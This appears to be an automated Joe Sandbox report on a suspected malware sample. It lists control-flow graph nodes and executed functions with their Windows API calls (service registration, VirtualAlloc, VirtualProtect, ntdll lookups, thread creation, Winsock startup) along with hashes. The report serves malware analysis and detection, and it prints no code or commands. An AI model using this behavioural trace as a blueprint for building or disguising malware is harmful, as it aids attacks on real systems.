2902->2904 2903->2897 2906 30657db 2904->2906 2907 30657ab 2904->2907 2905 3065a0d 2905->2897 2906->2897 2923 3065734 2907->2923 2913 3065c28 Sleep 2908->2913 2908->2916 2910->2905 2911 3065aec 2910->2911 2919 3065acd Sleep 2910->2919 2912 3065af8 2911->2912 2928 30656b8 2911->2928 2912->2897 2913->2901 2914->2910 2918 3065a9f Sleep 2914->2918 2917 3065c70 2916->2917 2920 30656b8 VirtualAlloc 2916->2920 2917->2897 2918->2900 2919->2911 2922 3065ae3 Sleep 2919->2922 2920->2917 2922->2910 2924 306577c 2923->2924 2925 306573d 2923->2925 2924->2906 2925->2924 2926 3065748 Sleep 2925->2926 2926->2924 2927 3065762 Sleep 2926->2927 2927->2925 2932 306564c 2928->2932 2930 30656c1 VirtualAlloc 2931 30656d8 2930->2931 2931->2912 2933 30655ec 2932->2933 2933->2930 3040 3525824 3041 30678e8 3040->3041 3042 3525854 VerSetConditionMask VerifyVersionInfoW 3041->3042 3043 35258a5 3042->3043 3044 30717b0 3045 30717db 3044->3045 3046 307184c RaiseException 3045->3046 3047 3071874 3045->3047 3063 30718e1 3046->3063 3049 3071914 3047->3049 3050 3071909 LoadLibraryA 3047->3050 3052 3071987 3047->3052 3047->3063 3048 3071a13 3053 3071a17 GetLastError 3048->3053 3048->3063 3054 3071963 3049->3054 3055 3071918 GetLastError 3049->3055 3050->3049 3051 3071a07 GetProcAddress 3051->3048 3052->3048 3052->3051 3052->3063 3056 3071a28 3053->3056 3060 30719a4 FreeLibrary 3054->3060 3061 3071971 3054->3061 3057 3071929 3055->3057 3059 3071a3a RaiseException 3056->3059 3056->3063 3057->3054 3058 307193b RaiseException 3057->3058 3058->3063 3059->3063 3060->3052 3061->3052 3062 3071977 LocalAlloc 3061->3062 3062->3052 2986 320fbf8 2987 320fc02 2986->2987 2991 320fc17 2986->2991 2988 320fc27 2987->2988 2989 320fc09 2987->2989 2998 320fb08 2988->2998 2989->2991 2993 320f1d4 2989->2993 2994 320f1e2 VariantClear 2993->2994 2995 320f1ef 2993->2995 2996 320f1ed 2994->2996 2995->2996 2997 320f25a VariantClear VariantInit 2995->2997 2996->2991 2997->2996 2999 320fb1e 2998->2999 3000 320fb17 2998->3000 3002 320fb2e VariantCopy 2999->3002 3003 320fb3f 2999->3003 3001 320f1d4 3 API calls 3000->3001 3001->2999 3004 320fb3a 3002->3004 3003->3004 3005 320fbe7 VariantCopy 3003->3005 3004->2991 3005->3004 2934 351a408 2935 351a44b 2934->2935 2936 351a4a4 RegisterServiceCtrlHandlerExW 2935->2936 2937 351a4b8 SetServiceStatus 2936->2937 2939 351a519 2936->2939 2944 3069d58 2937->2944 2948 3069ee0 2939->2948 2940 351a4ff 2942 351a506 Sleep 2940->2942 2942->2939 2942->2942 2945 3069d75 2944->2945 2946 3069d94 CreateThread 2945->2946 2947 3069dbd 2946->2947 2951 3069d20 2946->2951 2947->2940 2949 3069ee6 SysFreeString 2948->2949 2950 3069ef4 2948->2950 2949->2950 2952 3069d28 2951->2952

                                                                        Executed Functions

                                                                        Function 03525340 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36libraryloaderCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(ntdll.dll,NtQueryVirtualMemory), ref: 0352535F
                                                                        • GetProcAddress.KERNEL32(00000000,ntdll.dll), ref: 03525365
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmp, Offset: 03060000, based on PE: true
                                                                        • Associated: 0000002E.00000002.2541625894.0000000003060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000002E.00000002.2541685502.0000000003061000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_46_2_3060000_mama.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: NtQueryVirtualMemory$ntdll.dll
                                                                        • API String ID: 2574300362-2623246514
                                                                        • Opcode ID: 2d39965ea88bc7677b37fbc7362da61d51d85a9e0132d17c50762583318e90b2
                                                                        • Instruction ID: 31232d9ea68e95ff76ac7a749dc1b8609aaa4ff32639b6096ec4593d15d427ed
                                                                        • Opcode Fuzzy Hash: 2d39965ea88bc7677b37fbc7362da61d51d85a9e0132d17c50762583318e90b2
                                                                        • Instruction Fuzzy Hash: 4401A77DA04744DFD300EFE9F442E8A7BA2A786210F104161DC005B7F9E7B16906BF49
                                                                        Function 0306E2C8 Relevance: 3.1, APIs: 2, Instructions: 63COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetUserDefaultUILanguage.KERNEL32(00000003,?,00000004,00000000,0306E388,?,?), ref: 0306E2FA
                                                                        • GetLocaleInfoW.KERNEL32(?,00000003,?,00000004,00000000,0306E388,?,?), ref: 0306E303
                                                                          • Part of subcall function 0306E190: FindFirstFileW.KERNEL32(00000000,?,00000000,0306E1EE,?,00000001), ref: 0306E1C3
                                                                          • Part of subcall function 0306E190: FindClose.KERNEL32(00000000,00000000,?,00000000,0306E1EE,?,00000001), ref: 0306E1D3
                                                                        Memory Dump Source
                                                                        • Source File: 0000002E.00000002.2541685502.0000000003061000.00000040.00001000.00020000.00000000.sdmp, Offset: 03060000, based on PE: true
                                                                        • Associated: 0000002E.00000002.2541625894.0000000003060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_46_2_3060000_mama.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
                                                                        • String ID:
                                                                        • API String ID: 3216391948-0
                                                                        • Opcode ID: c8bfeb9fa33be1eff1d15aa33a6501cde8aef95ed3608478855121e3afaacaa8
                                                                        • Instruction ID: 2c86b4d4d93546fb2f45c549ffa1cb00fddb435227fea7a6b35d8c1155b5022a
                                                                        • Opcode Fuzzy Hash: c8bfeb9fa33be1eff1d15aa33a6501cde8aef95ed3608478855121e3afaacaa8
                                                                        • Instruction Fuzzy Hash: 67117CB8A01309AFDF00EFA8C991AEEB3B8EFC9700F504475A515EB258EB345E04C665
                                                                        Function 0306E190 Relevance: 3.0, APIs: 2, Instructions: 33fileCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • FindFirstFileW.KERNEL32(00000000,?,00000000,0306E1EE,?,00000001), ref: 0306E1C3
                                                                        • FindClose.KERNEL32(00000000,00000000,?,00000000,0306E1EE,?,00000001), ref: 0306E1D3
                                                                        Memory Dump Source
                                                                        • Source File: 0000002E.00000002.2541685502.0000000003061000.00000040.00001000.00020000.00000000.sdmp, Offset: 03060000, based on PE: true
                                                                        • Associated: 0000002E.00000002.2541625894.0000000003060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_46_2_3060000_mama.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Find$CloseFileFirst
                                                                        • String ID:
                                                                        • API String ID: 2295610775-0
                                                                        • Opcode ID: f0883d755cc0294b935e3f81023ec95cd08d3f44d9b16a4e02e7b60f7b37d622
                                                                        • Instruction ID: ceced8b0d263924b6b92300d393cb570048c941f9f2d94b310bfdbd21c4033fd
                                                                        • Opcode Fuzzy Hash: f0883d755cc0294b935e3f81023ec95cd08d3f44d9b16a4e02e7b60f7b37d622
                                                                        • Instruction Fuzzy Hash: F3F0E279501308AFCB50FBB8CD018CEF3ECEB8921075104B0A814EF554EB309F00A510
                                                                        Function 0306DDB4 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 173registryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0306DFD9,?,?), ref: 0306DDED
                                                                        • RegOpenKeyExW.ADVAPI32(80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0306DFD9,?,?), ref: 0306DE36
                                                                        • RegOpenKeyExW.ADVAPI32(80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0306DFD9,?,?), ref: 0306DE58
                                                                        • RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000), ref: 0306DE76
                                                                        • RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001), ref: 0306DE94
                                                                        • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002), ref: 0306DEB2
                                                                        • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 0306DED0
                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,0306DFBC,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0306DFD9), ref: 0306DF10
                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,00000000,0306DFBC,?,80000001), ref: 0306DF3B
                                                                        • RegCloseKey.ADVAPI32(?,0306DFC3,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,0306DFBC,?,80000001,Software\Embarcadero\Locales), ref: 0306DFB6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000002E.00000002.2541685502.0000000003061000.00000040.00001000.00020000.00000000.sdmp, Offset: 03060000, based on PE: true
                                                                        • Associated: 0000002E.00000002.2541625894.0000000003060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_46_2_3060000_mama.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Open$QueryValue$CloseFileModuleName
                                                                        • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
                                                                        • API String ID: 2701450724-3496071916
                                                                        • Opcode ID: 211ca52f47dc4ec897c2b11afb45bc54f9e2f94dc2bfaac22720fddb375f45d2
                                                                        • Instruction ID: a91efb78e4dd6bdceb848bf02f561d009293aa1cfeb3f7e14c3c977b20c880b8
                                                                        • Opcode Fuzzy Hash: 211ca52f47dc4ec897c2b11afb45bc54f9e2f94dc2bfaac22720fddb375f45d2
                                                                        • Instruction Fuzzy Hash: A4512179B4230DBEEB10EBA4CC41FEEB3FCEB49704F500465B614EE189D6B09A44CA55
                                                                        Function 03065F50 Relevance: 10.9, APIs: 7, Instructions: 406COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 35 3065f50-3065f5a 36 3065f60-3065f6b 35->36 37 3065fe8-3065feb 35->37 38 3065fa4-3065fbd call 30659d4 36->38 39 3065f6d-3065f76 36->39 40 3065ff1-3066003 37->40 41 3066258-306625d 37->41 57 3065fe3-3065fe6 38->57 58 3065fbf-3065fc5 38->58 42 3065f7c-3065f87 call 30659d4 39->42 43 3065f78-3065f7a 39->43 46 3066118-306611d 40->46 47 3066009-306600e 40->47 44 3066263-3066265 41->44 45 3065888-30658a6 41->45 75 3065f9f-3065fa1 42->75 76 3065f89-3065f9d call 3065590 call 3065d58 42->76 49 30658ac-30658b5 45->49 50 306598b-306598f 45->50 52 3066123-306612b 46->52 53 3066210-306622f call 30659d4 46->53 54 3066010-3066014 47->54 55 3066018-306601e 47->55 59 30658b7-30658b9 49->59 60 30658bb 49->60 61 3065991-3065999 50->61 62 306599b-30659a6 call 30659d4 50->62 52->53 64 3066131-3066138 52->64 94 3066202-3066206 53->94 95 3066231-3066237 53->95 66 3066035-3066050 55->66 67 3066020-3066026 55->67 70 3065fc7 58->70 71 3065fca-3065fe1 call 3065d58 58->71 72 30658bd-30658e3 VirtualQuery 59->72 60->72 73 30659ca-30659d3 61->73 62->73 101 30659a8-30659ae 62->101 77 3066195-306619a 64->77 78 306613a-3066147 64->78 68 3066052-306605f 66->68 69 3066098-30660a5 66->69 80 30660f0-30660fb call 30659d4 67->80 81 306602c-3066033 67->81 85 3066090-3066095 68->85 86 3066061-306606a 68->86 91 30660a7-30660ad 69->91 92 30660b0-30660bf 69->92 70->71 71->57 89 30658e5-30658f7 72->89 90 3065953-306595e call 30659d4 72->90 76->75 87 30661a7-30661cb 77->87 88 306619c-30661a6 call 30655ac 77->88 83 306617c-3066189 78->83 84 3066149-3066152 78->84 114 3066113-3066117 80->114 115 30660fd-3066111 call 3065590 call 3065d58 80->115 81->54 81->66 103 306618b-3066193 83->103 104 3066209 83->104 84->78 102 3066154-306616c Sleep 84->102 85->69 86->68 105 306606c-3066082 Sleep 86->105 107 30661cd-30661d4 87->107 108 30661d8-30661eb 87->108 88->87 89->90 109 30658f9-306590e 89->109 90->73 140 3065960-3065966 90->140 110 30660c6-30660d6 91->110 92->110 111 30660c1 call 30655ac 92->111 97 306623c-3066256 call 3065560 call 3065d58 95->97 98 3066239 95->98 98->97 118 30659b0-30659b5 101->118 119 30659b8-30659c5 call 3065590 call 3065d58 101->119 102->83 120 306616e-3066179 Sleep 102->120 103->77 103->104 104->53 105->85 121 3066084-306608d Sleep 105->121 123 30661f4-3066200 107->123 108->123 126 30661ed-30661ef call 30655ec 108->126 124 3065912-3065926 VirtualAlloc 109->124 125 3065910 109->125 129 30660e2-30660ef 110->129 130 30660d8-30660dd call 30655ec 110->130 111->110 115->114 118->119 119->73 120->78 121->68 123->94 124->90 136 3065928-306593c VirtualAlloc 124->136 125->124 126->123 130->129 136->90 144 306593e-3065951 136->144 145 3065970-3065989 call 3065560 call 3065d58 140->145 146 3065968-306596d 140->146 144->73 145->73 146->145
                                                                        Memory Dump Source
                                                                        • Source File: 0000002E.00000002.2541685502.0000000003061000.00000040.00001000.00020000.00000000.sdmp, Offset: 03060000, based on PE: true
                                                                        • Associated: 0000002E.00000002.2541625894.0000000003060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_46_2_3060000_mama.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 16431121b66bb3c322968f6bf971755ea3c14520ca77e1cb8e21446998f78478
                                                                        • Instruction ID: 4a25fcaf3b9219ef1d9a6dc83e5214a6d058e8b93bb1878a4a5eba8de1bba02a
                                                                        • Opcode Fuzzy Hash: 16431121b66bb3c322968f6bf971755ea3c14520ca77e1cb8e21446998f78478
                                                                        • Instruction Fuzzy Hash: E6C147667127050BE714EA7CDC847AEB3C69BC6221F1C863EE255CF39DDB69C8468390
                                                                        Function 030659D4 Relevance: 9.0, APIs: 7, Instructions: 298sleepCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 155 30659d4-30659e6 156 3065c34-3065c39 155->156 157 30659ec-30659fc 155->157 158 3065c3f-3065c50 156->158 159 3065d4c-3065d4f 156->159 160 3065a54-3065a5d 157->160 161 30659fe-3065a0b 157->161 163 3065c52-3065c6e 158->163 164 3065bf8-3065c05 158->164 165 3065d55-3065d57 159->165 166 3065780-30657a9 VirtualAlloc 159->166 160->161 162 3065a5f-3065a6b 160->162 167 3065a24-3065a30 161->167 168 3065a0d-3065a1a 161->168 162->161 174 3065a6d-3065a79 162->174 175 3065c70-3065c78 163->175 176 3065c7c-3065c8b 163->176 164->163 171 3065c07-3065c10 164->171 177 30657db-30657e1 166->177 178 30657ab-30657d8 call 3065734 166->178 172 3065a32-3065a40 167->172 173 3065aa8-3065ab1 167->173 169 3065a44-3065a51 168->169 170 3065a1c-3065a20 168->170 171->164 179 3065c12-3065c26 Sleep 171->179 185 3065ab3-3065ac0 173->185 186 3065aec-3065af6 173->186 174->161 180 3065a7b-3065a87 174->180 181 3065cd8-3065cee 175->181 183 3065ca4-3065cac 176->183 184 3065c8d-3065ca1 176->184 178->177 179->163 191 3065c28-3065c2f Sleep 179->191 180->160 192 3065a89-3065a99 Sleep 180->192 189 3065d07-3065d13 181->189 190 3065cf0-3065cfe 181->190 194 3065cae-3065cc6 183->194 195 3065cc8-3065cca call 30656b8 183->195 184->181 185->186 196 3065ac2-3065acb 185->196 187 3065b68-3065b74 186->187 188 3065af8-3065b23 186->188 202 3065b76-3065b88 187->202 203 3065b9c-3065bab call 30656b8 187->203 197 3065b25-3065b33 188->197 198 3065b3c-3065b4a 188->198 200 3065d34 189->200 201 3065d15-3065d28 189->201 190->189 199 3065d00 190->199 191->164 192->161 204 3065a9f-3065aa6 Sleep 192->204 205 3065ccf-3065cd7 194->205 195->205 196->185 206 3065acd-3065ae1 Sleep 196->206 197->198 208 3065b35 197->208 209 3065b4c-3065b66 call 30655ec 198->209 210 3065bb8 198->210 199->189 212 3065d39-3065d4b 200->212 211 3065d2a-3065d2f call 30655ec 201->211 201->212 213 3065b8c-3065b9a 202->213 214 3065b8a 202->214 217 3065bbd-3065bf6 203->217 223 3065bad-3065bb7 203->223 204->160 206->186 216 3065ae3-3065aea Sleep 206->216 208->198 209->217 210->217 211->212 213->217 214->213 216->185
                                                                        APIs
                                                                        • Sleep.KERNEL32(00000000), ref: 03065A8B
                                                                        • Sleep.KERNEL32(0000000A,00000000), ref: 03065AA1
                                                                        • Sleep.KERNEL32(00000000), ref: 03065ACF
                                                                        • Sleep.KERNEL32(0000000A,00000000), ref: 03065AE5
                                                                        Memory Dump Source
                                                                        • Source File: 0000002E.00000002.2541685502.0000000003061000.00000040.00001000.00020000.00000000.sdmp, Offset: 03060000, based on PE: true
                                                                        • Associated: 0000002E.00000002.2541625894.0000000003060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_46_2_3060000_mama.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Sleep
                                                                        • String ID:
                                                                        • API String ID: 3472027048-0
                                                                        • Opcode ID: 3ceed13b106fcb9c1e1cb2d1f39044aa8a8a8f284debf55012c2d78dace474ee
                                                                        • Instruction ID: 4912dfbe3cc2985c2368e6c38752ddd87d06c85a620f3599af222fc22affa757
                                                                        • Opcode Fuzzy Hash: 3ceed13b106fcb9c1e1cb2d1f39044aa8a8a8f284debf55012c2d78dace474ee
                                                                        • Instruction Fuzzy Hash: 5AC104726023518FD715DF29EC84B5AFBE1AB87320F0982AED4558F39DC7B0944ADB90
                                                                        Function 0320BF68 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 38memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 231 320bf68-320bfa2 call 306a364 call 320c878 236 320bfa4-320bfba VirtualProtect 231->236 237 320bfbd-320bfd2 call 3069ebc 231->237 236->237
                                                                        APIs
                                                                        • VirtualProtect.KERNEL32(?,?,?,?,00000000,0320BFD3), ref: 0320BFB4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmp, Offset: 03060000, based on PE: true
                                                                        • Associated: 0000002E.00000002.2541625894.0000000003060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000002E.00000002.2541685502.0000000003061000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_46_2_3060000_mama.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ProtectVirtual
                                                                        • String ID: VirtualProtect
                                                                        • API String ID: 544645111-268857135
                                                                        • Opcode ID: ca7d951ca20a774dbee64007f029b1dff9fc992e1e1d5eff2c5cb1d3f3e7a045
                                                                        • Instruction ID: f3abac9d2ee640e674b8f45ad2768de501e9b6f81237b691fc675eb6c68ecaf1
                                                                        • Opcode Fuzzy Hash: ca7d951ca20a774dbee64007f029b1dff9fc992e1e1d5eff2c5cb1d3f3e7a045
                                                                        • Instruction Fuzzy Hash: 54F08C79614308AFCB10EFA8D854C9EBBE9EB48210F504060F914D7781D730DA448F95
                                                                        Function 0306E394 Relevance: 3.1, APIs: 2, Instructions: 93COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetUserDefaultUILanguage.KERNEL32(00000000,0306E4AB,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0306E532,00000000,?,00000105), ref: 0306E43F
                                                                        • GetSystemDefaultUILanguage.KERNEL32(00000000,0306E4AB,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0306E532,00000000,?,00000105), ref: 0306E467
                                                                        Memory Dump Source
                                                                        • Source File: 0000002E.00000002.2541685502.0000000003061000.00000040.00001000.00020000.00000000.sdmp, Offset: 03060000, based on PE: true
                                                                        • Associated: 0000002E.00000002.2541625894.0000000003060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_46_2_3060000_mama.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: DefaultLanguage$SystemUser
                                                                        • String ID:
                                                                        • API String ID: 384301227-0
                                                                        • Opcode ID: e24a9e4800e255cc257e98d26a5f6b1cdccba008f318192357708c3d19ed4982
                                                                        • Instruction ID: 585e3c8929935f0ff04e23f84141e827eee87bfa0e9e1b2fa9c11700c730a71a
                                                                        • Opcode Fuzzy Hash: e24a9e4800e255cc257e98d26a5f6b1cdccba008f318192357708c3d19ed4982
                                                                        • Instruction Fuzzy Hash: E931413CA063199FDF10EBA8C980AEEB7F9EF84300F504865D411ABA58D774AD85CB91
                                                                        Function 0306E4B8 Relevance: 3.1, APIs: 2, Instructions: 55libraryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0306E572,?,00400000,0355EC1C,?,0306D270,00400000,?,0000020A,00400000,0355EC1C,0306D2B0), ref: 0306E4F4
                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0306E572,?,00400000,0355EC1C,?,0306D270,00400000,?,0000020A), ref: 0306E545
                                                                        Memory Dump Source
                                                                        • Source File: 0000002E.00000002.2541685502.0000000003061000.00000040.00001000.00020000.00000000.sdmp, Offset: 03060000, based on PE: true
                                                                        • Associated: 0000002E.00000002.2541625894.0000000003060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_46_2_3060000_mama.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FileLibraryLoadModuleName
                                                                        • String ID:
                                                                        • API String ID: 1159719554-0
                                                                        • Opcode ID: ee6b0b15198ab750789f166b6e3754236cf1bf3cc6c957101fff22b1fff0303c
                                                                        • Instruction ID: 7ab972060c143d0c3624f4829024c42041d964912d048e65f960094a63cd5f6c
                                                                        • Opcode Fuzzy Hash: ee6b0b15198ab750789f166b6e3754236cf1bf3cc6c957101fff22b1fff0303c
                                                                        • Instruction Fuzzy Hash: 6111A079A4131C9FDB10EB64CD95FDEB3B8EB84300F5140A5A408AB294EB705F84CEA1
                                                                        Function 03549234 Relevance: 3.0, APIs: 2, Instructions: 12networkCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 326 3549234-3549259 WSAStartup GetLastError
                                                                        APIs
                                                                        • WSAStartup.WS2_32(00000101,?), ref: 03549249
                                                                        • GetLastError.KERNEL32(?,03550B4F,00000000,03550EDA), ref: 0354924E
                                                                        Memory Dump Source
                                                                        • Source File: 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmp, Offset: 03060000, based on PE: true
                                                                        • Associated: 0000002E.00000002.2541625894.0000000003060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000002E.00000002.2541685502.0000000003061000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_46_2_3060000_mama.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorLastStartup
                                                                        • String ID:
                                                                        • API String ID: 1235836516-0
                                                                        • Opcode ID: d0ae1a61364f19c51dbc86b56a314533f706d8ca4255612c41436a9af4e94cd5
                                                                        • Instruction ID: 6c5d0a955023aa5d582cdd31cb360fb0040dbd7ce40b7a955774e570a0fab335
                                                                        • Opcode Fuzzy Hash: d0ae1a61364f19c51dbc86b56a314533f706d8ca4255612c41436a9af4e94cd5
                                                                        • Instruction Fuzzy Hash: CDC08074D5130C5BDB50FAD85C029DAB35C8740300F0002E55D0CCA242FDF11A5006E7
                                                                        Function 03069D58 Relevance: 1.5, APIs: 1, Instructions: 48threadCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 327 3069d58-3069d73 328 3069d75-3069d81 327->328 329 3069d83-3069d91 call 3066edc 327->329 333 3069d94-3069dbb CreateThread 328->333 329->333 334 3069dc4-3069dcc 333->334 335 3069dbd-3069dbf call 3066ef8 333->335 335->334
                                                                        APIs
                                                                        • CreateThread.KERNEL32(?,?,03069D20,00000000,?,?), ref: 03069DB2
                                                                        Memory Dump Source
                                                                        • Source File: 0000002E.00000002.2541685502.0000000003061000.00000040.00001000.00020000.00000000.sdmp, Offset: 03060000, based on PE: true
                                                                        • Associated: 0000002E.00000002.2541625894.0000000003060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000002E.00000002.2541685502.00000000035A1000.00000040.00001000.00020000.00000000.sdmpDownload File
